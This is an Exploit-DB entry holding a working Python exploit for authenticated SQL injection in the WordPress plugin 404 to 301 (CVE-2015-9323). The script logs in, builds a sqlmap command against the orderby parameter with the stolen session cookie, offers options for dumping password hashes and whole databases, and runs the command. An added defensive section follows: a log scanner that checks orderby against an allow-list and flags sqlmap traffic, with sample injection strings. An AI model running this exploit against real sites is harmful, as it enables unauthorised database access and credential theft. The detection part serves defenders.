WordPress Plugin 404 to 301 2.0.2 – SQL-Injection (Authenticated)

  • Author: Ron Jost
    Date: 2022-02-02
  • Source: https://www.exploit-db.com/exploits/50698/
    # Exploit Title: WordPress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
    # Date: 30.01.2022
    # Exploit Author: Ron Jost (Hacker5preme)
    # Vendor Homepage: https://de.wordpress.org/plugins/404-to-301/
    # Software Link: https://downloads.wordpress.org/plugin/404-to-301.2.0.2.zip
    # Version: <= 2.0.2
    # Tested on: Ubuntu 20.04
    # CVE: CVE-2015-9323
    # CWE: CWE-89
    # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2015-9323/README.md

    '''
    Description:
    The 404-to-301 plugin before 2.0.3 for WordPress has SQL injection.
    '''

    import argparse
    import os
    import requests
    from datetime import datetime

    banner = '''
    [+] 404 to 301 - SQL-Injection
    [@] Developed by Ron Jost (Hacker5preme)
    '''
    print(banner)

    # User input: all five values are needed to build the URLs below.
    my_parser = argparse.ArgumentParser(description='Wordpress Plugin 404 to 301 - SQL Injection')
    my_parser.add_argument('-T', '--IP', type=str, required=True, help='target host or IP')
    my_parser.add_argument('-P', '--PORT', type=str, required=True, help='target port')
    my_parser.add_argument('-U', '--PATH', type=str, required=True, help='WordPress path, e.g. /wordpress/')
    my_parser.add_argument('-u', '--USERNAME', type=str, required=True, help='WordPress username')
    my_parser.add_argument('-p', '--PASSWORD', type=str, required=True, help='WordPress password')
    args = my_parser.parse_args()
    target_ip = args.IP
    target_port = args.PORT
    wp_path = args.PATH
    username = args.USERNAME
    password = args.PASSWORD

    print('[*] Starting Exploit at: ' + datetime.now().strftime('%H:%M:%S'))


    # Authentication: log in so the session cookies can be handed to sqlmap.
    session = requests.Session()
    base_url = 'http://' + target_ip + ':' + target_port + wp_path
    auth_url = base_url + 'wp-login.php'
    # The initial GET sets the test cookie that the WordPress login form expects.
    session.get(auth_url)
    # Header:
    header = {
        'Host': target_ip,
        'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
        'Accept-Encoding': 'gzip, deflate',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Origin': 'http://' + target_ip,
        'Connection': 'close',
        'Upgrade-Insecure-Requests': '1'
    }

    # Body:
    body = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'testcookie': '1'
    }
    session.post(auth_url, headers=header, data=body)

    # SQL-Injection (Exploit):

    # Turn the authenticated session's cookie jar into a "name=value; name2=value2"
    # string, which is the format sqlmap's --cookie option expects.
    print('[+] Payload for sqlmap exploitation:')
    cookie = '; '.join(name + '=' + value for name, value in session.cookies.get_dict().items())

    exploit_url = 'sqlmap -u "' + base_url + 'wp-admin/admin.php?page=i4t3-logs&orderby=1"'
    exploit_risk = ' --level 2 --risk 2'
    exploit_cookie = ' --cookie="' + cookie + '" '

    print('Sqlmap options:')
    print('  -a, --all           Retrieve everything')
    print('  -b, --banner        Retrieve DBMS banner')
    print('  --current-user      Retrieve DBMS current user')
    print('  --current-db        Retrieve DBMS current database')
    print('  --passwords         Enumerate DBMS users password hashes')
    print('  --tables            Enumerate DBMS database tables')
    print('  --columns           Enumerate DBMS database table columns')
    print('  --schema            Enumerate DBMS schema')
    print('  --dump              Dump DBMS database table entries')
    print('  --dump-all          Dump all DBMS databases tables entries')
    retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
    exploit_code = exploit_url + exploit_risk + exploit_cookie + retrieve_mode + ' -p orderby -v0'
    os.system(exploit_code)
    print('Exploit finished at: ' + datetime.now().strftime('%H:%M:%S'))
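The script above points sqlmap at the `orderby` parameter of `wp-admin/admin.php?page=i4t3-logs`. An ORDER BY target cannot be bound as a prepared-statement parameter, so the server-side fix for this class of bug (CWE-89 in a sort parameter) is an allow-list of sortable column names or positions; the same allow-list also tells a defender which requests to that page could never have come from the plugin's own UI. The following is an added example written for this page, not code from the exploit author or from the 404-to-301 plugin: it parses combined-format web-server access logs, applies the allow-list to `orderby`, and reports offending client IPs. The column names in `ALLOWED_ORDERBY` are placeholders (the plugin's real log-table columns are not on this page), the log lines are constructed, and the User-Agent check relies on the fact that the sqlmap command above does not override sqlmap's default User-Agent, which contains the string `sqlmap`.

```python
"""Detection helper for the request shape used by the exploit above.

Added example, not part of the original exploit or of the 404-to-301 plugin.
"""
import re
from urllib.parse import parse_qs, urlsplit

# ASSUMPTION: placeholder set of sortable columns. The real plugin's column
# names are not on this page; a deployment would copy them from its log table.
ALLOWED_ORDERBY = {"id", "date", "url", "ref", "ip", "ua"}

# Combined log format: CLF fields plus quoted Referer and User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def orderby_is_allowed(value):
    """Server-side style check: accept a known column name or a small positive
    integer (a column position) and reject everything else. This is the same
    rule a fixed plugin would apply before building its ORDER BY clause."""
    if value.isdigit():
        return 1 <= int(value) <= len(ALLOWED_ORDERBY)
    return value.lower() in ALLOWED_ORDERBY


def inspect_line(line):
    """Return a list of indicator strings for one access-log line; an empty
    list means the line is not relevant to this vulnerability."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("path"))
    if not parts.path.endswith("/wp-admin/admin.php"):
        return []
    # parse_qs percent-decodes values, so "1%27" arrives here as "1'".
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("page") != ["i4t3-logs"]:
        return []
    findings = []
    for value in qs.get("orderby", []):
        if not orderby_is_allowed(value):
            findings.append("orderby outside allow-list: %r" % value)
    # The exploit's sqlmap command sets no User-Agent, so sqlmap's default
    # UA string is a useful second signal on the same request.
    if "sqlmap" in m.group("ua").lower():
        findings.append("sqlmap User-Agent")
    return findings


def scan(lines):
    """Map each flagged client IP to the indicators seen for it."""
    report = {}
    for line in lines:
        hits = inspect_line(line)
        if hits:
            ip = LOG_RE.match(line).group("ip")
            report.setdefault(ip, []).extend(hits)
    return report


# Constructed sample log lines (not captured traffic). Two benign sorts, two
# probes with non-allow-listed values, and one unrelated admin page.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jan/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=i4t3-logs&orderby=date HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [30/Jan/2022:10:00:02 +0000] "GET /wp-admin/admin.php?page=i4t3-logs&orderby=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Jan/2022:10:05:17 +0000] "GET /wp-admin/admin.php?page=i4t3-logs&orderby=1%27 HTTP/1.1" 500 0 "-" "sqlmap/1.6 (https://sqlmap.org)"',
    '198.51.100.7 - - [30/Jan/2022:10:05:18 +0000] "GET /wp-admin/admin.php?page=i4t3-logs&orderby=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.6 (https://sqlmap.org)"',
    '192.0.2.9 - - [30/Jan/2022:10:06:00 +0000] "GET /wp-admin/admin.php?page=other&orderby=1%27 HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip)
        for hit in hits:
            print("    " + hit)
```

Run against the constructed sample, only `198.51.100.7` is reported, with two allow-list violations and two User-Agent hits; the `page=other` line is ignored even though its `orderby` value is odd, because the check is scoped to the vulnerable page. The `orderby_is_allowed` rule is deliberately strict rather than a blocklist of SQL keywords: for a sort parameter the set of legitimate values is small and known, so anything else is worth a look.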